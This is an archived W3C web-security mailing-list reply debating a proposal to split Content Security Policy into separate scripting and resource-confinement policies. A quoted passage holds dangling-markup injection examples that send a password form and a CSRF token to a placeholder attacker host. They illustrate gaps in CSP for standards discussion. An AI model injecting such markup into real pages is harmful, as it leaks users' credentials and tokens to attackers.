
Re: A modest content security proposal.

From: Mike West <mkwst@google.com>
Date: Tue, 16 Jul 2019 12:54:02 +0200
Message-ID: <CAKXHy=e9stECw8Zv7SzJHwcgQ3ghVzY7kEMQ-cDiPg0xjHaGQw@mail.gmail.com>
To: Craig Francis <craig.francis@gmail.com>
Cc: Web Application Security Working Group <public-webappsec@w3.org>

Thanks for your feedback! I'll concentrate on the resource confinement
feedback, as it's the part I've thought least about, and I'd like to
understand your perspective!

On Mon, Jul 15, 2019 at 2:15 PM Craig Francis <craig.francis@gmail.com>
wrote:

> Initial thoughts from a web developer, one that really likes CSP...
>
> I like the idea of the browser providing the nonce, and that being used to
> white-list scripting - it feels like a good way to prove the website did
> intend to include that script. It also means the browser knows the nonce is
> random/unique (where developers should still be careful, since you're
> reflecting a value back into your HTML).
>
> And simplifying the process by locking down <base>, <object>,
> "javascript:" URLs, etc; that should set a good/simpler baseline (where I
> think "allow" should be renamed "allow-unsafe", and I would prefer eval to
> be "block" by default).
>

In hindsight, I don't think the `unsafe-` prefixes made us any friends in
the development community. Nor do I think they stopped anyone from doing
unsafe things. It just made them irate while they were doing so. :)
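For anyone following along, the server-generated nonce dance that a browser-provided nonce would replace looks something like this under today's CSP3 (the value below is a placeholder; a real nonce must be freshly generated and unpredictable for every response):

    Content-Security-Policy: script-src 'nonce-rAnd0m123'

    <script nonce="rAnd0m123" src="https://cdn.example.com/app.js"></script>

The reflection Craig mentions is exactly that round-trip: the server mints the value, emits it in the header, and echoes it on each script it intends to run.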


> The bit I feel like I'm missing, and it might be because I enjoy applying
> multiple layers of protection, is the *Resource Confinement* side.
>
> On my websites, I have a folder for static resources (`php_admin_flag
> engine off`), that's under version control, replaced every time the website
> is updated (with a diff check before), and it's not writable by the web
> server process (so no user uploaded/replaced content) - I like to ensure
> that all JS/CSS/Images/Fonts are loaded from that safe folder, and I can do
> that because the CSP specifies specific paths that are served from that
> locked-down folder.
>

It's certainly _possible_ to construct a path-limited policy like this
today. As far as I can tell, no one does this at any scale, as it's quite
brittle and requires close coordination between teams responsible for
different bits of a site. Likewise, the fact that we drop the path after a
cross-origin redirect significantly weakens the guarantees we can provide.
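Concretely, a path-limited policy along the lines Craig describes might look like this (hypothetical origin and folder layout, wrapped for readability):

    Content-Security-Policy: default-src 'none';
        script-src https://example.com/static/js/;
        style-src https://example.com/static/css/;
        img-src https://example.com/static/img/

The redirect caveat is that if, say, /static/js/app.js responds with a cross-origin redirect, the path component of the matching source expression is ignored when checking the redirect target, so the folder-level guarantee quietly evaporates.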

I agree that a pathless proposal is strictly less powerful than CSP, but it
seems like a reasonable place to start, given that that's what sites
generally seem to have landed on after a few years of experience with CSP.

> A possible solution would be a second domain, but that would slow the page
> load time a little bit, make the server config a bit more complex, and
> might lose some restrictions - such as the user-uploaded images folder
> containing a malicious JavaScript file (will I need a different domain for
> each resource type?).
>

I'm curious about the value you see here. It seems that script injection is
cleanly dealt with via the `Scripting-Policy` bits, and any protection
you're getting from confinement is additive. It can absolutely reduce risk
even further, but it's not clear to me that there's much value in
preventing script execution above and beyond pointing only to servers that
you trust?

> I also dynamically set the CSP for every page - e.g. most pages are ok with
> `connect-src 'none'` (from default-src), but when a page/script needs to
> use XMLHttpRequest, then I explicitly set the full URL for the 1 API it
> needs to access.
>

This is a lot of work! :)
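As a sketch of that per-page tightening (the API endpoint is hypothetical):

    Most pages:
        Content-Security-Policy: default-src 'self'; connect-src 'none'

    The one page that needs XMLHttpRequest:
        Content-Security-Policy: default-src 'self'; connect-src https://api.example.com/search

Every new fetch()/XHR call site means another header variant to maintain, which is part of why few deployments sustain this level of granularity.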


> The intention is to have layers... 1. my server side code shouldn't have
> any XSS vulnerabilities; if it does, 2. CSP should stop the loading of
> scripts; if that fails (e.g. a legitimate script was replaced by a hacker),
> 3. that script should be limited in what it can do to that page.
>

Nothing in this proposal (or CSP) limits the capability of a script to
modify a given page. They both seem to limit the ability of a script to
pull in resources, and potentially to exfiltrate data.

> This also applies to limiting what content can be loaded in frames (e.g.
> blocking an iframe from showing a malicious login form, which is why I have
> frame-src 'none' for most pages).
>

Presumably we'd add some sort of `frames` category to `Confinement-Policy`
to support this specific thing.


> And finally, some DOM messing around can cause issues:
>
>    <form action="https://evil.example.com">
>    <form action="./">
>       <input name="password" />
>    </form>
>
>    <img src='https://evil.example.com<form action="./"><input name="csrf"
> value="abc123" />...' />...
>

These are indeed problems (along with the rest of
http://lcamtuf.coredump.cx/postxss/).


> Maybe introduce Scripting-Policy first; then deprecate the
> old/un-necessary parts of CSP, but still keep CSP around with a focus on
> Resource Confinement?
>

`Scripting-Policy` is the bit I'm most interested in, to be sure. I'm
interested in `Confinement-Policy` mostly as a way to support the
belt-and-suspenders approach noted in
https://csp.withgoogle.com/docs/faq.html#strict-dynamic-with-whitelists.

I think it will be difficult to use `Scripting-Policy` with CSP's
`script-src` directive (or, at least, I'd consider it a non-goal to make
that interaction simple and easy). If we're going to run in this direction,
I'd prefer to just do one thing. Obviously we wouldn't dump CSP tomorrow,
but I don't think keeping both around forever is a reasonable plan.

Thanks!

-mike

Received on Tuesday, 16 July 2019 10:54:39 UTC
